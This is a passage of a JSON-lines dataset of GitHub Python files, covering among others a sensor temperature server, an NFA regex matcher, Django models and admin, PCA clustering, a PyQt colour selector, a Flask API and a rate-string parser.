temp_f = read_temp()\n temp_string = f'Temp: {temp_c} C, {temp_f} F'\n print(temp_string)\n await self.respond_async(temp_string.encode())\n\n\n @property\n def Temp_C(self):\n pass\n\n\n def update_state(self):\n pass\n\n\n# Assume we've mapped the device folder to /app\n# and its where this file is located\ndevice_folder = glob.glob('/sys/bus/w1/devices/28*')[0]\ndevice_file = device_folder + '/w1_slave'\n\n\ndef read_temp_raw():\n f = open(device_file, 'r')\n lines = f.readlines()\n f.close()\n return lines\n\n\ndef read_temp():\n print('Reading Temp')\n lines = read_temp_raw()\n while lines[0].strip()[-3:] != 'YES':\n time.sleep(0.2)\n lines = read_temp_raw()\n equals_pos = lines[1].find('t=')\n if equals_pos != -1:\n temp_string = lines[1][equals_pos+2:]\n temp_c = float(temp_string) / 1000.0\n temp_f = temp_c * 9.0 / 5.0 + 32.0\n return temp_c, temp_f\n\n\n\ndef main():\n print('Starting Server')\n temp = temp_server()\n asyncio.run(temp.listen_async())\n\n\nif __name__ == '__main__':\n main()","repo_name":"regananalytics/kubism.dev","sub_path":"examples/py/therm.py","file_name":"therm.py","file_ext":"py","file_size_in_byte":1490,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"42739163065","text":"from DirectedDFS import DirectedDFS\nimport matplotlib.pyplot as plt\nimport string\nimport math\nfrom fundamentals.directed_graphs.DiGraph import DiGraph\n\n\nclass NFA:\n def __init__(self, reg_exp):\n assert len(reg_exp) >= 2 and reg_exp[0] == '(' and reg_exp[-1] == ')'\n self.reg_exp = reg_exp\n self.meta_chars = set('()*|')\n\n self.digraph = self.build_epsilon_transition_digraph()\n return\n\n def recognizes(self, text):\n # Simulation of NFA\n m = len(self.reg_exp)\n n = len(text)\n\n # Start at state 0\n # Get reachable states from start, even before scanning any character from the text\n dfs = DirectedDFS(self.digraph, [0])\n states = [x for x in range(m + 1) if dfs.marked(x)]\n\n for idx in range(n):\n # Scan text\n matched = list()\n for v in states:\n if self.reg_exp[v] == '.' or self.reg_exp[v] == text[idx]:\n matched.append(v + 1)\n\n # Make epsilon transitions\n dfs = DirectedDFS(self.digraph, matched)\n states = [x for x in range(m+1) if dfs.marked(x)]\n\n return m in states\n\n def build_epsilon_transition_digraph(self):\n # Construction of NFA\n m = len(self.reg_exp)\n digraph = DiGraph(m + 1)\n stack = list()\n\n for i in range(m):\n curr_char = self.reg_exp[i]\n\n if curr_char not in self.meta_chars:\n # Alphabet or .\n # digraph.add_edge(i, i+1)\n if i < m-1 and self.reg_exp[i + 1] == '*':\n digraph.add_edge(i, i+1)\n digraph.add_edge(i+1, i)\n else:\n # Process each metacharacter appropriately\n if curr_char == '(':\n digraph.add_edge(i, i+1)\n stack.append(i)\n elif curr_char == '|':\n stack.append(i)\n elif curr_char == '*':\n digraph.add_edge(i, i+1)\n else:\n digraph.add_edge(i, i+1)\n if len(stack) == 1:\n # No | in between\n op_loc = stack.pop()\n else:\n # | in between\n or_loc = stack.pop()\n op_loc = stack.pop()\n\n digraph.add_edge(op_loc, or_loc + 1)\n digraph.add_edge(or_loc, i)\n\n if i < m-1 and self.reg_exp[i + 1] == '*':\n digraph.add_edge(op_loc, i + 1)\n digraph.add_edge(i + 1, op_loc)\n\n return digraph\n\n\nif __name__ == '__main__':\n rexp = '((a*b|ac)*d)'\n nfa = NFA(rexp)\n\n m = len(rexp)\n\n vertex_point_map = dict()\n sorted_vertices = list(range(m + 1))\n points = DiGraph._get_circle_points([0.5, 0.5], 0.4, 2 * m + 1)\n vertex_point_map = dict(zip(sorted_vertices[::-1], points))\n # vertex_point_map = dict(zip(list(range(m + 1)), [[idx * 0.5, 0.0] for idx in range(m+1)]))\n\n fig, ax = plt.subplots(1, 1, figsize=(8, 8))\n nfa.digraph.plot(ax, 'o', 'k', 'r', vertex_point_map=vertex_point_map, texts=rexp + '$')\n plt.show()\n\n texts = ['abd', 'bd', 'bacd', 'aaabd', 'aaabac', 'aaabacd']\n for text in texts:\n print(f\"{text} {nfa.recognizes(text)}\")","repo_name":"gsravank/ds_algo","sub_path":"fundamentals/regular_expressions/NFA.py","file_name":"NFA.py","file_ext":"py","file_size_in_byte":3385,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"25643570062","text":"from django.contrib import admin\n\nfrom .models import Category, Genre, Title, GenreTitle, Review, Comment\n\n\nclass CategoryAdmin(admin.ModelAdmin):\n list_display = (\n 'pk',\n 'name',\n 'slug',\n )\n search_fields = ('name',)\n list_filter = ('name',)\n prepopulated_fields = {'slug': ('name',)}\n empty_value_display = '-пусто-'\n\n\nclass GenreAdmin(admin.ModelAdmin):\n list_display = (\n 'pk',\n 'name',\n 'slug',\n )\n search_fields = ('name',)\n list_filter = ('name',)\n prepopulated_fields = {'slug': ('name',)}\n empty_value_display = '-пусто-'\n\n\nclass TitleAdmin(admin.ModelAdmin):\n list_display = (\n 'pk',\n 'name',\n 'year',\n 'description',\n 'category',\n )\n search_fields = ('name', 'year', 'category')\n list_filter = ('name',)\n empty_value_display = '-пусто-'\n\n\nclass GenreTitleAdmin(admin.ModelAdmin):\n list_display = (\n 'pk',\n 'title_id',\n 'genre_id',\n )\n search_fields = ('title',)\n empty_value_display = '-пусто-'\n\n\nclass ReviewAdmin(admin.ModelAdmin):\n list_display = (\n 'pk',\n 'text',\n 'author',\n 'score',\n 'pub_date',\n )\n search_fields = ('author',)\n empty_value_display = '-пусто-'\n\n\nclass CommentAdmin(admin.ModelAdmin):\n list_display = (\n 'pk',\n 'text',\n 'author',\n 'pub_date',\n 'review',\n )\n search_fields = ('author', 'review',)\n empty_value_display = '-пусто-'\n\n\nadmin.site.register(Category, CategoryAdmin)\nadmin.site.register(Genre, GenreAdmin)\nadmin.site.register(Title, TitleAdmin)\nadmin.site.register(GenreTitle, GenreTitleAdmin)\nadmin.site.register(Review, ReviewAdmin)\nadmin.site.register(Comment, CommentAdmin)\n","repo_name":"Adelina1231/api_yamdb","sub_path":"api_yamdb/reviews/admin.py","file_name":"admin.py","file_ext":"py","file_size_in_byte":1807,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"25398893047","text":"import datetime as dt\nimport schedule\n\n\ndef job():\n time = dt.datetime.now()\n time = time.hour % 12\n print(\"ку \" * int(time))\n\n\nschedule.every().hour.at(\":00\").do(job)\n\nwhile True:\n schedule.run_pending()\n \n","repo_name":"jeley0/semester_36","sub_path":"Modern_applications/Lab1/lab1.6.py","file_name":"lab1.6.py","file_ext":"py","file_size_in_byte":224,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"27188913194","text":"# acc_cv2.py\n#\n# Author: Adam Sandler\n# Date: 10/18/18\n#\n# Computes accuracy for each CV, returns plot in /plots/ folder, and\n# mean, stDev, and p-value for both train & validation sets\n# - uses csv from no-decomposition\n#\n# Uses CV data\n#\n# Dependencies:\n# Packages: matplotlib, numpy, pandas, scipy, sklearn\n# Data: asdHBTucker\n\nimport numpy as np\nfrom scipy import stats\nimport pandas as pd\nfrom sklearn.feature_selection import mutual_info_classif\nfrom sklearn.feature_selection import SelectKBest\nfrom sklearn.feature_selection import SelectFpr\nfrom sklearn.feature_selection import f_classif\nfrom sklearn.decomposition import PCA\nfrom sklearn.exceptions import ConvergenceWarning\nfrom hmap import heatmap\nfrom warnings import filterwarnings\n\n\ndef acc(classifier, fname, labelF, indF, splits=10, fselect='None', nfeat=100, featmin=3, a=.05, header=True,\n hmap=False, f=True):\n\n if f:\n filterwarnings(\"ignore\", category=ConvergenceWarning)\n acc = []\n acc_tr = []\n\n # load data\n if header:\n cts = pd.read_csv(fname + '.csv', header=0, index_col=0, dtype={0: str})\n else:\n cts = pd.read_csv(fname + '.csv', header=None, index_col=None)\n ind = pd.read_csv(indF + '.csv', header=None)\n label = pd.read_csv(labelF + '.csv', header=0, index_col=0)\n rows = np.where(ind > 0)[0]\n if cts.shape[0] == len(rows):\n phi = cts\n else:\n phi = cts.iloc[rows]\n cancer = label.iloc[rows, 0]\n ind = ind.iloc[rows, 0]\n\n i = 0\n for i in range(0, splits):\n\n rows = np.where(ind != i + 1)\n X = phi.iloc[rows]\n s = X.shape\n if len(s) == 3:\n X = np.reshape(X, [s[0], s[1] * s[2]])\n else:\n X = np.reshape(X, [s[0], s[1]])\n y = cancer.iloc[rows]\n y = np.reshape(y, s[0])\n rows = np.where(ind == i + 1)\n X_test = phi.iloc[rows]\n s = X_test.shape\n if len(s) == 3:\n X_test = np.reshape(X_test, [s[0], s[1] * s[2]])\n else:\n X_test = np.reshape(X_test, [s[0], s[1]])\n y_test = cancer.iloc[rows]\n y_test = np.reshape(y_test, s[0])\n\n # subset features\n if 'min' in fselect:\n cols = np.where(X.astype(bool).sum(axis=0) > featmin)[0]\n X = X.iloc[:, cols]\n X_test = X_test.iloc[:, cols]\n\n if 'MI' in fselect:\n model = SelectKBest(mutual_info_classif, k=nfeat).fit(X, y)\n X = model.transform(X)\n X_test = model.transform(X_test)\n elif 'PCA'in fselect:\n model = PCA(n_components=nfeat).fit(X)\n X = model.transform(X)\n X_test = model.transform(X_test)\n elif 'reg' in fselect:\n model = SelectFpr(f_classif, alpha=a).fit(X, y)\n X = model.transform(X)\n X_test = model.transform(X_test)\n\n if hmap:\n heatmap(X, y, tail='_{0}_train'.format(i))\n heatmap(X_test, y_test, tail='_{0}_test'.format(i))\n\n # fit model\n model = classifier.fit(X, y)\n\n # Compute accuracy for validation set\n probas_ = model.predict_proba(X_test)\n y_hat = np.argmax(probas_, axis=1)\n acc.append(sum(y_hat == y_test)/len(y_test))\n\n # Compute accuracy for training set\n probas_ = model.predict_proba(X)\n y_hat = np.argmax(probas_, axis=1)\n acc_tr.append(sum(y_hat == y) / len(y))\n\n i += 1\n\n results = stats.ttest_1samp(acc, popmean=755/2126)\n p_val = results[1]\n\n results = stats.ttest_1samp(acc_tr, popmean=755/2126)\n p_val_tr = results[1]\n\n return np.mean(acc), np.std(acc), p_val, np.mean(acc_tr), np.std(acc_tr), p_val_tr\n","repo_name":"ars2240/asdHBTucker","sub_path":"acc_cv2.py","file_name":"acc_cv2.py","file_ext":"py","file_size_in_byte":3677,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"21651860416","text":"# -*- coding: utf-8 -*-\n########################################################################\n#\n# (c) 2009-2013 Markus Dittrich\n#\n# This program is free software; you can redistribute it\n# and/or modify it under the terms of the GNU General Public\n# License Version 3 as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License Version 3 for more details.\n#\n# You should have received a copy of the GNU General Public\n# License along with this program; if not, write to the Free\n# Software Foundation, Inc., 59 Temple Place - Suite 330,\n# Boston, MA 02111-1307, USA.\n#\n#######################################################################\n\nfrom PyQt4.QtCore import (QObject, \n Qt, \n SIGNAL)\n\nfrom PyQt4.QtGui import (QColor, \n QColorDialog,\n QFrame, \n QHBoxLayout,\n QPushButton,\n QWidget) \n\n\n\n#########################################################\n## \n## class for managing the color selection widget\n##\n#########################################################\nclass ColorWidget(QWidget):\n\n def __init__(self, parent = None):\n\n super(ColorWidget, self).__init__(parent)\n\n\n def initialize(self, synchronizer, colors):\n\n self._synchronizer = synchronizer\n \n # set up layout\n layout = QHBoxLayout()\n\n # we need to keep a list of all ColorSelectorItems so we can\n # parse them later for their colors when saving as spf\n # or set their color when loading an spf.\n self.colorWidgets = []\n for color in colors:\n newItem = ColorSelectorItem(color, synchronizer)\n layout.addWidget(newItem)\n self.colorWidgets.append(newItem)\n if color == QColor(Qt.white):\n synchronizer.select(newItem)\n\n colorButton = QPushButton(\"customize color\")\n QObject.connect(colorButton, SIGNAL(\"pressed()\"),\n self.customized_color_button_pressed)\n layout.addWidget(colorButton)\n layout.addStretch()\n \n self.setLayout(layout)\n\n\n def customized_color_button_pressed(self):\n \"\"\" \n Deal with user requests to customize colors.\n \"\"\"\n\n oldColor = self._synchronizer.get_active_widget().color\n color = QColorDialog.getColor(oldColor, None,\n \"Select Custom Color\")\n\n if color.isValid():\n self._synchronizer.change_active_color(color)\n\n\n\n def get_all_colors(self):\n \"\"\" Returns a list with of (color, state) tuples currently available\n as ColorSelectorItems.\n\n The state it 1 if the item is active and 0 for the inactive rest.\n \"\"\"\n\n activeWidget = self._synchronizer.get_active_widget()\n allColors = []\n for item in self.colorWidgets:\n state = 1 if item == activeWidget else 0\n allColors.append((item.color, state))\n\n return allColors\n \n\n\n\n#########################################################\n## \n## class for managing a single symbol selector item\n##\n#########################################################\nclass ColorSelectorItem(QFrame):\n\n def __init__(self, color, synchronizer, parent = None):\n\n super(ColorSelectorItem, self).__init__(parent)\n\n self._synchronizer = synchronizer\n self.itemColor = QColor(color)\n\n # define and set stylesheets\n self.define_stylesheets() \n self.setStyleSheet(self._unselectedStyleSheet)\n self.selected = False\n\n self.setMinimumHeight(40)\n self.setMaximumHeight(40)\n self.setMinimumWidth(40)\n self.setMaximumWidth(40)\n\n \n @property\n def color(self):\n \"\"\" Returns the color content controled by this widget. \"\"\"\n\n return self.itemColor\n\n\n\n @color.setter\n def color(self, color):\n \"\"\" Sets the current color of the selector. \"\"\"\n\n self.itemColor = color\n self.define_stylesheets()\n\n # need this to update colors \n if self.selected:\n self.activate_me()\n else:\n self.inactivate_me()\n\n\n\n def define_stylesheets(self):\n \"\"\"\n Defines the stylesheets used for active/inactive look\n of this widget.\n \"\"\"\n\n buttonColor = QColor(self.itemColor).name()\n self._selectedStyleSheet = \"border-width: 2px;\" \\\n \"margin: 0px;\" \\\n \"padding: 6px;\" \\\n \"border-style: solid;\" \\\n \"border-color: black;\" \\\n \"background-color: \" + \\\n buttonColor + \";\" \n\n self._unselectedStyleSheet = \"border-width: 1px;\" \\\n \"margin: 7px;\" \\\n \"border-style: solid;\" \\\n \"border-color: black;\" \\\n \"background-color: \" + \\\n buttonColor + \";\" \n\n \n\n def mousePressEvent(self, event): \n \"\"\"\n Acts on mouse press events and uses the synchronizer\n for selecting.\n \"\"\"\n\n self._synchronizer.select(self)\n\n\n\n def activate_me(self):\n \"\"\"\n This slot activates the item.\n \"\"\"\n\n self.setStyleSheet(self._selectedStyleSheet)\n self.selected = True\n\n\n\n def inactivate_me(self):\n \"\"\"\n This slot inactivates the item.\n \"\"\"\n\n self.setStyleSheet(self._unselectedStyleSheet)\n self.selected = False\n\n\n\n\n#########################################################\n## \n## class for synchronizing color selector widgets\n##\n## NOTE: In contrast to the symbol selector synchronizer,\n## this one does not allow to deselect a color button,\n## i.e., some color has to be selected at all times\n##\n#########################################################\nclass ColorSynchronizer(QObject):\n\n\n def __init__(self, parent = None):\n\n QObject.__init__(self, parent)\n self._activeWidget = None\n self._activeColor = None\n\n\n\n def select(self, target):\n \"\"\" This method notifies the canvas that the color selector\n has changed.\n\n NOTE: We need to go via the canvas since it needs to keep\n track for the undo/redo framework.\n \n \"\"\"\n\n self.emit(SIGNAL(\"synchronized_object_changed\"), target) \n\n\n\n def change_active_color(self, newColor):\n \"\"\" This method notifies the canvas that the color of\n the currently active selector has changed.\n\n NOTE: We need to go via the canvas since it needs to keep\n track for the undo/redo framework.\n \n \"\"\"\n \n self.emit(SIGNAL(\"active_color_changed\"), newColor)\n\n \n\n def select_plain(self, target):\n \"\"\" This function does most of the work and is also\n called by the canvas redo/undo machinery after we emit\n synchronized_color_selector.\n\n \"\"\"\n\n if self._activeWidget != target:\n if self._activeWidget:\n self._activeWidget.inactivate_me()\n\n self._activeWidget = target\n self._activeWidget.activate_me()\n\n \n\n def get_active_widget(self):\n \"\"\" Simply returns the active widget to anybody who cares \n to know. \"\"\"\n\n return self._activeWidget\n\n\n\n \n","repo_name":"haskelladdict/sconcho","sub_path":"sconcho/gui/color_widget.py","file_name":"color_widget.py","file_ext":"py","file_size_in_byte":7755,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"72"} +{"seq_id":"39757168852","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import migrations, models\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('content', '0004_auto_20190319_1208'),\n ]\n\n operations = [\n migrations.AddField(\n model_name='foreword',\n name='photo',\n field=models.ImageField(upload_to=b'photos/', null=True, verbose_name=\"Owner's Picture\", blank=True),\n ),\n ]\n","repo_name":"sonlinux/centro-pricetag","sub_path":"django_project/content/migrations/0005_foreword_photo.py","file_name":"0005_foreword_photo.py","file_ext":"py","file_size_in_byte":464,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"6098030250","text":"from sklearn.decomposition import PCA\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport seaborn as sns\nfrom sklearn.manifold import TSNE\nfrom sklearn.cluster import KMeans\nimport pandas as pd\n\n\nclass DimensionReducer:\n def __init__(self, manager):\n self.manager = manager\n self.pca = PCA()\n self.tsne = TSNE(random_state=123, perplexity=5)\n\n def kmeans_clustering(self, components):\n total_explained_variance = 0\n for pc, explained_variance in enumerate(self.pca.explained_variance_ratio_):\n total_explained_variance += explained_variance\n if total_explained_variance < 0.5:\n continue\n else:\n break\n X = [component[:pc] for component in components]\n x = []\n y = []\n for data_point in X:\n x.append(data_point[0])\n y.append(data_point[1])\n model = KMeans(n_clusters=3)\n # fit the model\n model.fit(X)\n # assign a cluster to each example\n yhat = model.predict(X)\n return yhat\n\n @staticmethod\n def explained_variance_plot(dimension_reducer, *args, **kwargs):\n plt.figure(figsize=(8, 8))\n sns.lineplot(x=['Comp_{}'.format(index) for index, _ in enumerate(dimension_reducer.explained_variance_ratio_)],\n y=dimension_reducer.explained_variance_ratio_)\n plt.xticks(rotation=90)\n plt.ylabel('Variance explained ratio')\n if 'suffix' not in kwargs:\n plt.savefig('PCA_explained_variance.png')\n return\n plt.savefig('PCA_explained_variance_{}.png'.format(kwargs['suffix']))\n plt.close()\n\n def compare_group_and_cluster(self, clusters, *args, **kwargs):\n data_dict = {'0': [], '1': [], '2':[]}\n for index, cluster in enumerate(list(clusters)):\n if cluster == 0:\n data_dict['0'].append(self.original_group[index])\n elif cluster == 1:\n data_dict['1'].append(self.original_group[index])\n elif cluster == 2:\n data_dict['2'].append(self.original_group[index])\n data_to_plt = []\n groups = list(set(self.original_group))\n for k, v in data_dict.items():\n to_add = {'cluster': k}\n for group in groups:\n to_add[group] = v.count(group)\n data_to_plt.append(to_add)\n df = pd.DataFrame(data_to_plt)\n df = df.set_index(['cluster'])\n plt.figure()\n df.plot.bar(stacked=True)\n plt.xlabel(\"group\")\n # Add a legend\n plt.legend(loc='upper left')\n if 'suffix_final' not in kwargs:\n plt.savefig('cluster_group.png')\n return\n plt.savefig('cluster_group_{}.png'.format(kwargs['suffix_final']))\n plt.close()\n\n @property\n def original_group(self):\n group = []\n for k, v in self.manager.data_fetcher.data.items():\n group.append(v['group'])\n return group\n\n @staticmethod\n def first_2_dimension_plot(components, group, *args, **kwargs):\n first_2_dimension = [component[:2] for component in components]\n x = []\n y = []\n for data_point in first_2_dimension:\n x.append(data_point[0])\n y.append(data_point[1])\n plt.figure()\n sns.scatterplot(x=x, y=y, hue=group)\n if 'suffix_final' not in kwargs:\n plt.savefig('fist_2_dimension.png')\n return\n plt.savefig('first_2_dimension_{}.png'.format(kwargs['suffix_final']))\n plt.close()\n\n def pca_dimension_reduction(self, *args, **kwargs):\n if 'data' not in kwargs:\n X = np.array([v['data'] for k, v in self.manager.data_fetcher.data.items()])\n else:\n X = np.array([v['data'] for k, v in kwargs['data'].items()])\n components = self.pca.fit_transform(X)\n self.explained_variance_plot(self.pca, *args, **kwargs)\n self.first_2_dimension_plot(components,\n group=self.original_group,\n suffix_final='original_{}'.format(kwargs['suffix']))\n self.first_2_dimension_plot(components,\n group=self.kmeans_clustering(components),\n suffix_final='cluster_{}'.format(kwargs['suffix']))\n self.compare_group_and_cluster(self.kmeans_clustering(components),\n suffix_final='cluster_{}'.format(kwargs['suffix']))\n\n def tsne_dimension_reduction(self, *args, **kwargs):\n if 'data' not in kwargs:\n X = np.array([v['data'] for k, v in self.manager.data_fetcher.data.items()])\n else:\n X = np.array([v['data'] for k, v in kwargs['data'].items()])\n components = self.tsne.fit_transform(X)\n self.first_2_dimension_plot(components, *args, **kwargs)\n","repo_name":"s1060046/dimension_reduction","sub_path":"dimension_reduction/pca/dimension_reducer.py","file_name":"dimension_reducer.py","file_ext":"py","file_size_in_byte":4923,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"20623287714","text":"from Listasligadas import LinkedList\n\nl=LinkedList()\nprint(f\"L esta vacioa? {l.is_empty()}\")\n\nl.append(10)\nl.append(5)\nl.append(6)\nl.append(20)\n\nprint(f\"L esta vacioa? {l.is_empty()}\")\nl.transversal()\n","repo_name":"MI177/edd_1310_2021","sub_path":"Clase17_11_2020/Pruebaslistasligadas.py","file_name":"Pruebaslistasligadas.py","file_ext":"py","file_size_in_byte":201,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"28483069504","text":"# https://leetcode.com/problems/simplify-path/\n\nclass Solution:\n def simplifyPath(self, path: str) -> str:\n simple = []\n \n for d in path.split('/'):\n if d in ['', '.']:\n continue\n if d == '..':\n if simple: simple.pop()\n else:\n simple.append(d)\n \n return '/' + '/'.join(simple)\n \n","repo_name":"nawrazi/competitive-programming","sub_path":"week_35/simplify-path.py","file_name":"simplify-path.py","file_ext":"py","file_size_in_byte":406,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"13855718559","text":"from django.db import models\nfrom products.models import Product\nfrom django.conf import settings\n\n\nclass Order(models.Model):\n customer = models.ForeignKey(settings.AUTH_USER_MODEL, on_delete=models.SET_NULL, null=True, blank=True) # ForeignKey to User model\n date_ordered = models.DateTimeField(auto_now_add=True)\n complete = models.BooleanField(default=False, null=True, blank=False)\n transaction_id = models.CharField(max_length=200, null=True)\n\n def __str__(self):\n return str(self.customer)\n\n @property\n def shipping(self):\n shipping = False\n order_items = self.orderitem_set.all()\n for item in order_items:\n if item.product.digital is False:\n shipping = True\n return shipping\n\n @property\n def get_cart_total(self):\n order_items = self.orderitem_set.all()\n total = sum([item.get_total for item in order_items])\n return total\n\n @property\n def get_cart_items(self):\n order_items = self.orderitem_set.all()\n total = sum([item.quantity for item in order_items])\n return total\n\n\nclass OrderItem(models.Model):\n product = models.ForeignKey(Product, on_delete=models.SET_NULL, blank=True, null=True)\n order = models.ForeignKey(Order, on_delete=models.SET_NULL, blank=True, null=True)\n quantity = models.IntegerField(default=0, null=True, blank=True)\n date_added = models.DateTimeField(auto_now_add=True)\n\n @property\n def get_total(self):\n total = self.product.price * self.quantity\n return total\n\n\nclass ShippingAddress(models.Model):\n customer = models.ForeignKey(settings.AUTH_USER_MODEL, on_delete=models.SET_NULL, blank=True, null=True)\n order = models.ForeignKey(Order, on_delete=models.SET_NULL, blank=True, null=True)\n address = models.CharField(max_length=200, null=True)\n city = models.CharField(max_length=200, null=True)\n state = models.CharField(max_length=200, null=True)\n zipcode = models.CharField(max_length=200, null=True)\n date_added = models.DateTimeField(auto_now_add=True)\n\n def __str__(self):\n return self.address\n","repo_name":"Amin-Aghili/subworkit","sub_path":"order/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":2135,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"41534492294","text":"#!venv/bin/python\nimport importlib\nimport os\nimport time\n\nfrom flask import Flask, jsonify, request\n\nfrom backend import ImageData, PATH_TO_IMAGES\n\nif not os.path.exists(PATH_TO_IMAGES):\n os.makedirs(PATH_TO_IMAGES)\n print(\"Starting loading images\")\n importlib.import_module('load-images')\n print(\"Images loaded\")\nelse:\n print(\"Images already downloaded to the disk\")\n\nimage_data = ImageData()\n\napp = Flask(__name__)\n\n@app.route('/api/v1.0/get-points/', methods=['GET'])\ndef get_points(userId):\n return jsonify({'points': 178})\n\n\n@app.route('/api/v1.0/check-location//', methods=['GET'])\ndef check_location(lng, lat):\n challenge_id, encoded_img = image_data.get_image_for_location(lng, lat)\n if encoded_img is not None:\n return jsonify({\"found\": 1, \"image\": encoded_img, \"challengeId\": challenge_id})\n else:\n return jsonify({\"found\": 0})\n\n@app.route('/api/v1.0/submit-challenge-photo', methods=['POST'])\ndef submit_challenge_photo():\n time.sleep(7)\n encoded_image = request.json[\"img\"]\n challenge_id = request.json[\"challengeId\"]\n result = image_data.compare_images(image_data.challenges[challenge_id], encoded_image)\n return jsonify({\"challengeId\": challenge_id, \"points\": result})\n\n\nif __name__ == '__main__':\n app.run(debug=True)\n","repo_name":"deephack18/picstory-api","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":1310,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"12058055935","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\n'adjacency matrix'\n\n__author__ = 'lxp'\n\n#《大话数据结构》227页\n#在后面图的遍历会调用这个模块,在review时候发现。\n#后面的遍历针对的是无权无向图,在那两个模块中,判断联通的条件是权值为1\n#因为后两个模块要求的权值输入,若联通则权值输1\n\nimport numpy as np\n\nclass MGraph(object):\n\tdef __init__(self):\n\t\tself.vexs = []\n\t\tself.arc = None\n\t\tself.numVertexes = 0\n\t\tself.numEdges = 0\n\n\tdef createMGraph(self):\n\t\tself.numVertexes = int(input(\"请输入点数: \"))\n\t\tself.numEdges = int(input(\"请输入边数: \"))\n\t\tself.arc = np.zeros([self.numVertexes, self.numVertexes])\n\n\t\tfor x in range(self.numVertexes):\n\t\t\tself.vexs.append(input(\"依次输入顶点信息: \"))\n\n\t\tfor i in range(self.numVertexes):\n\t\t\tfor j in range(self.numVertexes):\n\t\t\t\tif i != j:\n\t\t\t\t\tself.arc[i][j] = float(\"inf\")\n\n\t\tfor x in range(self.numEdges):\n\t\t\tvi = int(input(\"请输入边(vi, vj)的下标i: \"))\n\t\t\tvj = int(input(\"请输入边(vi, vj)的下标j: \"))\n\t\t\tw = int(input(\"请输入边(vi, vj)的权重w: \"))\n\t\t\tself.arc[vi][vj] = self.arc[vj][vi] = w\n\t\t\t\n\t\treturn\n\n\tdef showMGraph(self):\n\t\tprint(self.arc)\n\t\treturn\n\n#test\ndef test():\n\tsample = MGraph()\n\tsample.createMGraph()\n\tsample.showMGraph()\n\treturn\n\nif __name__ == '__main__':\n\ttest()\n\n###input输入的是str,需要转换\n","repo_name":"LiuXPeng/pythonDataStructure","sub_path":"adjacencyMatrix.py","file_name":"adjacencyMatrix.py","file_ext":"py","file_size_in_byte":1397,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"70732404394","text":"from flask import Blueprint\n\nfrom .resources import IndexResource\nfrom .resources.media import (\n create_media, \n list_media, \n get_media_by_id,\n delete_media_by_id,\n update_media_by_id\n)\n\nbp = Blueprint(\"restapi\", __name__, url_prefix=\"/api/v1\")\n\ndef init_app(app):\n bp.add_url_rule('/', 'index', IndexResource)\n bp.add_url_rule('/media', 'create_media', create_media, methods=['POST'])\n bp.add_url_rule('/media', 'list_media', list_media, methods=['GET'])\n bp.add_url_rule('/media/', 'get_media_by_id', get_media_by_id, methods=['GET'])\n bp.add_url_rule('/media/', 'delete_media_by_id', delete_media_by_id, methods=['DELETE'])\n bp.add_url_rule('/media/', 'update_media_by_id', update_media_by_id, methods=['PUT'])\n\n app.register_blueprint(bp)\n \n \n\n\n","repo_name":"IvanFrezzaJr/pond5","sub_path":"pond5/blueprints/resapi/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":804,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"11090664867","text":"import re\nfrom datetime import timedelta as TimeDelta\n\nSECOND = TimeDelta(seconds=1)\nMINUTE = 60 * SECOND\nHOUR = 60 * MINUTE\nDAY = 24 * HOUR\nWEEK = 7 * DAY\nMONTH = 31 * DAY\nYEAR = 365 * DAY\n\nMILLISECOND = SECOND / 1000\n\nUNITS: dict[str, TimeDelta] = {\n 'ms': MILLISECOND,\n 'millisecond': MILLISECOND,\n 'milliseconds': MILLISECOND,\n 's': SECOND,\n 'second': SECOND,\n 'seconds': SECOND,\n 'm': MINUTE,\n 'minute': MINUTE,\n 'minutes': MINUTE,\n 'h': HOUR,\n 'hour': HOUR,\n 'hours': HOUR,\n 'd': DAY,\n 'day': DAY,\n 'days': DAY,\n 'w': WEEK,\n 'week': WEEK,\n 'weeks': WEEK,\n 'mo': MONTH,\n 'month': MONTH,\n 'months': MONTH,\n 'y': YEAR,\n 'year': YEAR,\n 'years': YEAR,\n}\n\n\nclass Rate:\n REGEX = re.compile(\n r'(?P[0-9]+)/(?P[0-9]*)(?P[a-zA-Z]+)'\n )\n\n def __init__(self, count: int, duration: TimeDelta):\n self.count = count\n self.duration = duration\n\n @classmethod\n def from_string(cls, s: str):\n m = cls.REGEX.match(s)\n if m is None:\n raise ValueError(f'\"{s}\" is not a valid rate string.')\n count = int(m.group('count'))\n unit_str = m.group('unit').lower()\n if unit_str not in UNITS:\n raise ValueError('\"{unit_str}\" is not a valid unit.')\n unit = UNITS[unit_str]\n duration = int(m.group('duration') or 1)\n return cls(count, duration * unit)\n\n @property\n def per_second(self) -> float:\n return self.count / self.duration.total_seconds()\n\n def 